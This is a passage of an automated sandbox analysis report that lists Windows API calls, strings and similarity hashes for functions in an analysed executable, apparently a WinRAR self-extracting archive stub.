    • CloseHandle.KERNEL32(?), ref: 000CEABF
    • ShowWindow.USER32(?,00000001), ref: 000CEB21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
    • String ID: .exe$.inf
    • API String ID: 783751319-3750412487
    • Opcode ID: fc7d27aceffcbf349a6e0ad2e4eff3e65c863da54c430f36654b99415e727376
    • Instruction ID: e610c5b062e1a4d2b462b4596559076bef463b796179262cbcb37c0d74798815
    • Opcode Fuzzy Hash: fc7d27aceffcbf349a6e0ad2e4eff3e65c863da54c430f36654b99415e727376
    • Instruction Fuzzy Hash: 6E51BC311083C0AEEB719B60D844FBFBBE5EF84744F08881EF5C597191EB7199848B92
    APIs
    • __EH_prolog.LIBCMT ref: 000BA5EE
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000BA611
    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000BA630
      • Part of subcall function 000BD6A7: _wcslen.LIBCMT ref: 000BD6AF
      • Part of subcall function 000C3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,000BD523,00000000,.exe,?,?,00000800,?,?,?,000C9E4C), ref: 000C331C
    • _swprintf.LIBCMT ref: 000BA6CC
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • MoveFileW.KERNEL32(?,?), ref: 000BA73B
    • MoveFileW.KERNEL32(?,?), ref: 000BA77B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
    • String ID: rtmp%d
    • API String ID: 3726343395-3303766350
    • Opcode ID: ce6513ceb75d26d0714434ac2392b044b23284a097a0cb98d376fcec9e4fc81d
    • Instruction ID: ec806c2323a60b39a1c6abf1af5234ccb0ce1331e45cd771d5bb857ddcb626a7
    • Opcode Fuzzy Hash: ce6513ceb75d26d0714434ac2392b044b23284a097a0cb98d376fcec9e4fc81d
    • Instruction Fuzzy Hash: C3413D71A545696ACB20ABA0CC85EEF77BCFF56340F0404AAB545E3046EF748A85CF61
    APIs
    • __aulldiv.LIBCMT ref: 000C253E
      • Part of subcall function 000BC619: GetVersionExW.KERNEL32(?), ref: 000BC63E
    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 000C2561
    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 000C2573
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000C2584
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C2594
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C25A4
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000C25DF
    • __aullrem.LIBCMT ref: 000C2689
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: fc0dd195213154c672eba198532d7283972872e7436b3560ebb47ffc4fa3920e
    • Instruction ID: d93ec87814b1afe725a4b4eb2332aaee93e700952623f51cf719d5e639e962b9
    • Opcode Fuzzy Hash: fc0dd195213154c672eba198532d7283972872e7436b3560ebb47ffc4fa3920e
    • Instruction Fuzzy Hash: 1E4137B1508345AFD710DF65C884A6FBBE9FB88714F00892EF596D2610E738E549CB62
    APIs
    Strings
    Similarity
    • API ID: _wcslen
    • String ID: </p>$</style>$<br>$<style>$>
    • API String ID: 176396367-3568243669
    • Opcode ID: c902a21e84e434786f7612df4e258221ff71020d6639374a807df9febe438817
    • Instruction ID: 40ef1ad7823ac90f7690ccdc9bd8e3fbd9b855d84aec8b175c80a371fee1973b
    • Opcode Fuzzy Hash: c902a21e84e434786f7612df4e258221ff71020d6639374a807df9febe438817
    • Instruction Fuzzy Hash: 3251462674036B95DB705B285811FBF63E0DF6235AF64442EF9C38B6C1FA658D8182A2
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,000E0FB2,00000000,00000000,00000000,00000000,00000000,000D659D), ref: 000E087F
    • __fassign.LIBCMT ref: 000E08FA
    • __fassign.LIBCMT ref: 000E0915
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 000E093B
    • WriteFile.KERNEL32(?,00000000,00000000,000E0FB2,00000000,?,?,?,?,?,?,?,?,?,000E0FB2,00000000), ref: 000E095A
    • WriteFile.KERNEL32(?,00000000,00000001,000E0FB2,00000000,?,?,?,?,?,?,?,?,?,000E0FB2,00000000), ref: 000E0993
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: 2e14b83c446d1dd12d2c6207ffd1bbfa5b2587a4ae5ce477bb516e701abbe424
    • Instruction ID: a23b3b3ecf01668a4616ceb428e056b29058dcb91e142cc8b47946610a46021e
    • Opcode Fuzzy Hash: 2e14b83c446d1dd12d2c6207ffd1bbfa5b2587a4ae5ce477bb516e701abbe424
    • Instruction Fuzzy Hash: 7551B3B1A002899FDB10CFA9DC85BEEBBF8EF09310F14415AE595F7252E7749980CB60
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 000D3AB7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 000D3ABF
    • _ValidateLocalCookies.LIBCMT ref: 000D3B48
    • __IsNonwritableInCurrentImage.LIBCMT ref: 000D3B73
    • _ValidateLocalCookies.LIBCMT ref: 000D3BC8
    Strings
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 5eeee65ebbaca63fe507331a3da9b33ce63024a275acfea12236a19c5f78bde0
    • Instruction ID: 6585911822f965a2be77a97c121f7da6d0934265edc020c41d733abc8a2faca6
    • Opcode Fuzzy Hash: 5eeee65ebbaca63fe507331a3da9b33ce63024a275acfea12236a19c5f78bde0
    • Instruction Fuzzy Hash: A941A334A003189FCF50DF69C885A9EBBF5AF44324F148167EA186B353D735AA15CFA2
    APIs
    Strings
    Similarity
    • API ID: _wcslen
    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
    • API String ID: 176396367-3743748572
    • Opcode ID: f6109bd105f28865ecb8f6563ec5d55a1fd30dd8b2dc5df478c1521ca180f96b
    • Instruction ID: d65f9e943c99af93c695e9cd59ee51a78ee4a13ca996ec1534191c716cc6953f
    • Opcode Fuzzy Hash: f6109bd105f28865ecb8f6563ec5d55a1fd30dd8b2dc5df478c1521ca180f96b
    • Instruction Fuzzy Hash: D3312C22744749AAD634AB54AC42FBE73E4EB51328F60842FF59557291FBB0AC44C3B3
    APIs
      • Part of subcall function 000DDA18: _free.LIBCMT ref: 000DDA41
    • _free.LIBCMT ref: 000DDAA2
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DDAAD
    • _free.LIBCMT ref: 000DDAB8
    • _free.LIBCMT ref: 000DDB0C
    • _free.LIBCMT ref: 000DDB17
    • _free.LIBCMT ref: 000DDB22
    • _free.LIBCMT ref: 000DDB2D
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction ID: 920d73d21fce31cd11168c1be65cb8cfcb23eb9ff108a51ed959938c35b10519
    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction Fuzzy Hash: BB111F71A44B04FAD620BBB4CC0BFCB779C6F15700F448C17B29A7A293DA65B50547B2
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000CF7E5,000CF748,000CF9E9), ref: 000CF781
    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000CF797
    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000CF7AC
    Strings
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 667068680-1718035505
    • Opcode ID: 07262f634c715ed95769f1c6d5a7932f64e4b624ecf205459cc72cfb4d9c6ed0
    • Instruction ID: ba701e9b8f75bb064dbca4d362c05809fcfebea073f3444b166582e1c64eb96f
    • Opcode Fuzzy Hash: 07262f634c715ed95769f1c6d5a7932f64e4b624ecf205459cc72cfb4d9c6ed0
    • Instruction Fuzzy Hash: C9F022323092635B9F704FA46EC4FBE22CA8F057A0360063DDA20F7A44E320CC8046D2
    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C27E1
      • Part of subcall function 000BC619: GetVersionExW.KERNEL32(?), ref: 000BC63E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000C2805
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 000C281F
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 000C2832
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C2842
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C2852
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: e7c5aa19629f8a0d8c40e45ceb24aa94edb8e7eb6f2588cead5fa59a964f970d
    • Instruction ID: a74624e59975a2a8cd7bf699d028cf7aa64aa31f36417368c4e7efc5a71780bf
    • Opcode Fuzzy Hash: e7c5aa19629f8a0d8c40e45ceb24aa94edb8e7eb6f2588cead5fa59a964f970d
    • Instruction Fuzzy Hash: 76311775108346ABC704DFA8D88499BB7E8BF98B04F005A2EF999D3210E734D549CBA6
    APIs
    • GetLastError.KERNEL32(?,?,000D3C71,000D3A2C,000D0BE4), ref: 000D3C88
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000D3C96
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000D3CAF
    • SetLastError.KERNEL32(00000000,000D3C71,000D3A2C,000D0BE4), ref: 000D3D01
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: d07c0e7bd67a8578291de6f327d8199fa3a8f00cdf13a3897fa7b51ca5d019fb
    • Instruction ID: f2f9bc3a542acc97b786cb3958faf33404fd81697a37c76152d58a4b685c3a62
    • Opcode Fuzzy Hash: d07c0e7bd67a8578291de6f327d8199fa3a8f00cdf13a3897fa7b51ca5d019fb
    • Instruction Fuzzy Hash: C101283261E3113EF66427787C8676B2B85EF41771F30132BF520B57E2EE252D00A6A2
    APIs
    • GetLastError.KERNEL32(?,000F30C4,000D5972,000F30C4,?,?,000D53ED,?,?,000F30C4), ref: 000DA509
    • _free.LIBCMT ref: 000DA53C
    • _free.LIBCMT ref: 000DA564
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA571
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA57D
    • _abort.LIBCMT ref: 000DA583
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: 9193e658fe65b81403c36447ad4acb3f28aac5d06b532de3ceea154750b455ca
    • Instruction ID: 95715da39e0bcec2341e574fc24f34cf2e6a9a7b23d1a1f5179efa73e2c74977
    • Opcode Fuzzy Hash: 9193e658fe65b81403c36447ad4acb3f28aac5d06b532de3ceea154750b455ca
    • Instruction Fuzzy Hash: 60F0F431B44B02A7E21133357C0AFAF199A9BC3B21B250427F614A2397EF358E41D476
    APIs
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000CED87
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CEDA1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000CEDB2
    • TranslateMessage.USER32(?), ref: 000CEDBC
    • DispatchMessageW.USER32(?), ref: 000CEDC6
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000CEDD1
    Similarity
    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 2148572870-0
    • Opcode ID: 77aed7e52e1915fdf67aaa83b624dd9cadca255047ba097926a3fb54e6175a39
    • Instruction ID: c545d9331c558e9781a3faeb61c88fb491bf9a175a5fa19cd2526189692e1692
    • Opcode Fuzzy Hash: 77aed7e52e1915fdf67aaa83b624dd9cadca255047ba097926a3fb54e6175a39
    • Instruction Fuzzy Hash: 14F0EC72A01229ABCB20ABA5EC4CEDF7F6DEF85791B108421B60BE6051D6349585C7E0
    APIs
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000BCD5C: _wcsrchr.LIBVCRUNTIME ref: 000BCD73
    • _wcslen.LIBCMT ref: 000BD5A4
    • _wcslen.LIBCMT ref: 000BD5EC
    Strings
    Similarity
    • API ID: _wcslen$_wcsrchr
    • String ID: .exe$.rar$.sfx
    • API String ID: 3513545583-31770016
    • Opcode ID: e14821c295e6c600499c79051dd7778089acb2817887f8ed64e17e99185133a0
    • Instruction ID: 7ded1820981896a17e031ba594ed78ab97cc0f8404f036457d526eb0ca1fbed8
    • Opcode Fuzzy Hash: e14821c295e6c600499c79051dd7778089acb2817887f8ed64e17e99185133a0
    • Instruction Fuzzy Hash: 2B412722900B5099D731AF348846AFFF3F8EF55758B14490FF996AB182F7608E81D399
    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 000CDFD0
      • Part of subcall function 000BCAA0: _wcslen.LIBCMT ref: 000BCAA6
    • _swprintf.LIBCMT ref: 000CE004
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • SetDlgItemTextW.USER32(?,00000066,00102892), ref: 000CE024
    • EndDialog.USER32(?,00000001), ref: 000CE131
    Strings
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
    • String ID: %s%s%u
    • API String ID: 110358324-1360425832
    • Opcode ID: 06d203922446a80baeb037edb16ed5997c6eb63e451df692151d8ffe53ffbdce
    • Instruction ID: f1c15801c207a6102f8aefc06fd6b50f0bef39b4f50a5ae2ab02958084d8d711
    • Opcode Fuzzy Hash: 06d203922446a80baeb037edb16ed5997c6eb63e451df692151d8ffe53ffbdce
    • Instruction Fuzzy Hash: 05416075900658AADF25DB90CC45FEE77FCEB05304F4480ABF909A7052EFB09A848F61
    APIs
    • _wcslen.LIBCMT ref: 000BCF56
    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,000BB505,?,?,00000800,?,?,000BB4CA,?), ref: 000BCFF4
    • _wcslen.LIBCMT ref: 000BD06A
    Strings
    Similarity
    • API ID: _wcslen$CurrentDirectory
    • String ID: UNC$\\?\
    • API String ID: 3341907918-253988292
    • Opcode ID: 1b1768aa4e0bd8a4f1a951d3f7aa82f8a0eaf58b2d3981f0dc82a5901160b86b
    • Instruction ID: f4eca7139b756f23bc03f5916e4da34db0c4834ac76136fa56b4eee1502c0542
    • Opcode Fuzzy Hash: 1b1768aa4e0bd8a4f1a951d3f7aa82f8a0eaf58b2d3981f0dc82a5901160b86b
    • Instruction Fuzzy Hash: 0F41C13145025ABADF20BF20CC01FEEB7A9EF09390F24442BF954E7142F770D9528AA1
    APIs
    • LoadBitmapW.USER32(00000065), ref: 000CC8CD
    • GetObjectW.GDI32(00000000,00000018,?), ref: 000CC8F2
    • DeleteObject.GDI32(00000000), ref: 000CC924
    • DeleteObject.GDI32(00000000), ref: 000CC947
      • Part of subcall function 000CB6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000CC91D,00000066), ref: 000CB6D5
      • Part of subcall function 000CB6C2: SizeofResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB6EC
      • Part of subcall function 000CB6C2: LoadResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB703
      • Part of subcall function 000CB6C2: LockResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB712
      • Part of subcall function 000CB6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,000CC91D,00000066), ref: 000CB72D
      • Part of subcall function 000CB6C2: GlobalLock.KERNEL32(00000000), ref: 000CB73E
      • Part of subcall function 000CB6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000CB762
      • Part of subcall function 000CB6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000CB7A7
      • Part of subcall function 000CB6C2: GlobalUnlock.KERNEL32(00000000), ref: 000CB7C6
      • Part of subcall function 000CB6C2: GlobalFree.KERNEL32(00000000), ref: 000CB7CD
    Strings
    Similarity
    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
    • String ID: ]
    • API String ID: 1797374341-3352871620
    • Opcode ID: 6b6b5c88e0aa07712c28fd7aaeebe42d8f7c74f1947440a06f6add4852c49914
    • Instruction ID: 7874d7eaf13d1a75c77ddc486b2e4e8b2e066d035c9d050e60403e3a4e79d445
    • Opcode Fuzzy Hash: 6b6b5c88e0aa07712c28fd7aaeebe42d8f7c74f1947440a06f6add4852c49914
    • Instruction Fuzzy Hash: 6A01C036900A01A7E71177A4DC0AFFF3ABADF85B61F140018F944B7292DF358D0986A0
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CE78B
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 000CE7A1
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 000CE7B5
    • SetDlgItemTextW.USER32(?,00000068), ref: 000CE7C4
    Strings
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: RENAMEDLG
    • API String ID: 364370097-3299779563
    • Opcode ID: 5ce5b0ee4f1c572ddeacda383631324533af1c10539912569767cd4b933e6cb4
    • Instruction ID: c92c826d97bd93575c5be99fe10b3552d4dbcfd59608246442537bc9482605f9
    • Opcode Fuzzy Hash: 5ce5b0ee4f1c572ddeacda383631324533af1c10539912569767cd4b933e6cb4
    • Instruction Fuzzy Hash: C1012832289360BAE2254B64DE08FEF7BADFB99B02F104218F301A64D0C6A259458775
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000D91D6,?,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002), ref: 000D9245
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000D9258
    • FreeLibrary.KERNEL32(00000000,?,?,?,000D91D6,?,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002,00000000), ref: 000D927B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 0a5df77f829b490a79094be3d205e9df4d9a7602b331f51efcd1314a9612711a
    • Instruction ID: eb61a3b51d30498c45ec7e1ea716556e902c3bae649350935ae7f542783e56aa
    • Opcode Fuzzy Hash: 0a5df77f829b490a79094be3d205e9df4d9a7602b331f51efcd1314a9612711a
    • Instruction Fuzzy Hash: 4EF04431A04248BBDF519BA5DC49BADBFB4EF44B11F40016AFA09B6261CB745E41CA50
    APIs
      • Part of subcall function 000C1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
      • Part of subcall function 000C1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000C063F
    • GetProcAddress.KERNEL32(000FA1F0,CryptUnprotectMemory), ref: 000C064F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 64fb42cf842884d0324d0dad38cf2f3780850888aa2ca649bd9b692b55c38fcf
    • Instruction ID: 04cf2f4c0311ba41b2ae1775e6648b9191c6dd389b8c3a644d26b627d685cd6a
    • Opcode Fuzzy Hash: 64fb42cf842884d0324d0dad38cf2f3780850888aa2ca649bd9b692b55c38fcf
    • Instruction Fuzzy Hash: 16E04F708457C19EE7605F769808F46BFD45B54B11F00881EA395A7652D7B4D440CB10
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AdjustPointer$_abort
    • String ID:
    • API String ID: 2252061734-0
    • Opcode ID: 74aa9eabf855864e890c31eeb195f46a0ec4b662b861c6740c34114fc7018d8e
    • Instruction ID: 6530d80f0711f88b5abe07e9c319d08dacff04a60aad286789c3b78ea5980952
    • Opcode Fuzzy Hash: 74aa9eabf855864e890c31eeb195f46a0ec4b662b861c6740c34114fc7018d8e
    • Instruction Fuzzy Hash: C051AF75A053069FDB698F14D841BAAB7E5EF54300F14452BE8059B3D2E731EE80CBB2
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 000DD0E9
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000DD10C
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000DD132
    • _free.LIBCMT ref: 000DD145
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000DD154
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: bd58080c8cb61752a8c60fd774433ad6c9a0873e603bcf649507d47436c7b178
    • Instruction ID: f74a34934082101ebf834fdc481260020b906c45e4588e2d17980272c15972fb
    • Opcode Fuzzy Hash: bd58080c8cb61752a8c60fd774433ad6c9a0873e603bcf649507d47436c7b178
    • Instruction Fuzzy Hash: 9901A276602365BF3B311AB66C8CC7F6AADEFC2FA1314016BFD04D6341EA648C0291B0
    APIs
    • GetLastError.KERNEL32(?,?,?,000DA7E0,000DC338,?,000DA533,00000001,00000364,?,000D53ED,?,?,000F30C4), ref: 000DA58E
    • _free.LIBCMT ref: 000DA5C3
    • _free.LIBCMT ref: 000DA5EA
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA5F7
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA600
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
